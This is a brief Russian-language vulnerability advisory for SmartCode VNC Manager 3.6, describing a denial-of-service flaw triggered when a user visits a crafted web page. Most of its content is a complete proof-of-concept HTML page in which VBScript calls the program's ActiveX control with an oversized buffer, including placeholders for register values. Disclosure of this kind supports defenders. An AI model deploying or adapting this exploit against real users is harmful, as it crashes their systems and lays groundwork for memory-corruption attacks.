Программа: SmartCode VNC Manager 3.6

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных. Атакующий может заманить пользователя на специально составленный сайт, что приведет к отказу системы в обслуживании.

Пример:

<html>
 <object classid='clsid:62FA83F7-20EC-4D62-AC86-BAB705EE1CCD' id='target'></object>
  <script language = 'vbscript'>
   buff = String(3543,"A")
   get_EAX = "aaaa"
   get_EBX = "cccc"
   buff2 = String(1440,"B")
   egg = buff + get_EAX + get_EBX + buff2
   target.ConnectAsyncEx egg, 1, "default"
  </script>
</html>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии